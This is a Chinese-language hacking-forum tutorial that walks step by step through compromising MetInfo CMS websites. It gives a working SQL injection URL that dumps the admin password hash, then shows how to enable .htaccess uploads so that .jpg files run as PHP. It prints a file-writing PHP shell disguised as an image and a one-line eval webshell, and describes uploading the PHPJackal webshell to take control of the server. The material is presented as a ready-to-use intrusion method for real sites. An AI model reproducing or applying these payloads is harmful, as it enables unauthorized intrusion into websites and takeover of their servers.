菜鸟起飞从红客联盟开始

Hon123

当前位置: Home > 云学院 > 网络安全 >

MetInfo 新版本通杀入侵教程

视频地址

作者:admin QQ:46252916 团队:

视频介绍
标题:MetInfo 新版本通杀入侵教程
 
作者Q:46252916
 
QQ群:301145022
 
入侵测试网站:本地服务器(phpstudy)
 
------------------------------------------------------------
暴密码SQL:
 
/member/login.php/aa'UNION%20SELECT%20(select%20concat(admin_id,0x23,admin_pass)%20from%20met_admin_table%20limit%201),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa
 
------------------------------------------------------------
 
今天来做一个教程,MetInfo 新版本通杀入侵教程。
 
为了更直观的讲解,我所用的为本地服务器。
 
咱们先来下载最新版本的源码。
 
将源码放到WWW文件内。本地打开。好,打开http://localhost
 
在这里说一下,想要入侵Metinfo版本的网站,须要服务器为apache。这个等会再说。
 
进入网站之后在后面加上上面所写的代码。打开。
 
右键-查看源代码
 
Linux#21232f297a57a5a743894a0e4a801fc3
 
在这个位置直接将帐号密码给暴出来。
 
帐号:Linux
 
密码:admin
 
这个经过MD5加密过的代码,是要放到专门破解的网站上来破解。
 
我在这里面推荐一个。
 
推荐:https://www.somd5.com/
 
这个网站所有的MD5都不收费,裤子算是我见到过最大的。而且还免费,
 
在其他网站收费的解密内容在这里面都是不收费的。
 
咱们破解一下。
 
解密得到密码明文为:admin
 
咱们进入后台尝试登陆
 
这个后台地址 在域名后面加上admin
 
进入admin目录。
 
如果管理员不修改的话,进入是正确的。如果修改了,输入了admin
进不去后台的。
 
进入之后可以看一下这个网站所属的服务器。
 
咱们要的为apache或nginx
 
如果是IIS的话,也得是IIS7.0或IIS7.5
 
因为咱们入侵这个网站利用的为服务器的解析漏洞。
 
以我所用的搜狗浏览器所示。按F12,选择Network,选择了之后再F5刷新一下。
 
找到第一个点击。右侧有一个Server.
 
Server:Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
 
这句话是说用的服务器为apache 2.4.23 
 
PHP版本为5.4.45
 
现在已经进入了后台。现在开始尝试服务器入侵。
 
第一步:先上传.htaccess文件
 
.htaccess文件内容为:
 
AddType application/x-httpd-php .jpg
 
这句话的意思为 将同目录下的JPG文件以php文件的方式运行。
 
进入后台,点击安全 - 安全与效率 
 
将自动重命名勾选取消。
 
将允许上传的文件格式 加入htaccess,注意:不要加点。
 
好已经将htaccess 文件名加入,现在可以上传htaccess文件了
 
点击 设置 - 栏目 - 将栏目的第一个点击设置
 
上传.htaccess文件(上传位置在栏目图片处)
 
上传成功。
打开来看看。
 
错误代码 403 Forbidden
 
这个文件已经在服务器里面了 ,只不过服务器不允许显示罢了。
 
咱们再上传一张图片,图片里面写入PHP代码。
 
图片名:sc1.jpg
 
内容:
 
<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
?> 
 
自己随便写的一个,这个源码可以将自己输入的内容保存为文件。
 
算是一个小马吧。
 
咱们再上传这个图片文件。
 
 
/upload/201708/sc1.jpg
 
图片上传成功。
 
打开来看看。
 
成功,看到这个页面可以说百分百能入侵成功了。
 
保存一个文件测试一下。
 
成功将文件写入服务器。
 
接下来,咱们再上传一句话木马。
 
如果用这个sc1.jpg上传大马的话会出现乱码的情况,所以先上传一个一句话木马,再通过一句话木马上传大马。
 
<?php @eval($_POST['c']);?>
 
一句话木马以上,密码为c
 
写入的时候一定要php后缀。
 
虽然没有看到错误,这就是说明能打开这个页面了,因为一句话木马是不显示的。
 
也可以调出F12,看响应。
 
Status Code:200 OK 
 
状态码 200 正确。
 
再通过一句话客户端。
 
上传大马。
 
成功连接。
 
上传大马。
 
PHPJackal.php为大马。
 
OK 上传成功。
打开来看看。
 
最上面的四个字为乱码,因为我改过了,我等会将没有修改过的打包。
 
OK 网站的权限已经得到。
 
最后再说一下:这个利用的漏洞算是很老的漏洞了。
 
用到的 为上传htaccess的这种方式,也算不得为解析漏洞。
 
只不过是将jpg文件改变成了php运行方式而已。但是有些时候入侵网站这都是致使的。
 
好的,教程到此结束。
 
欢迎加群:301145022 
 
稍后再加入nginx的入侵方法。
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
栏目列表
推荐视频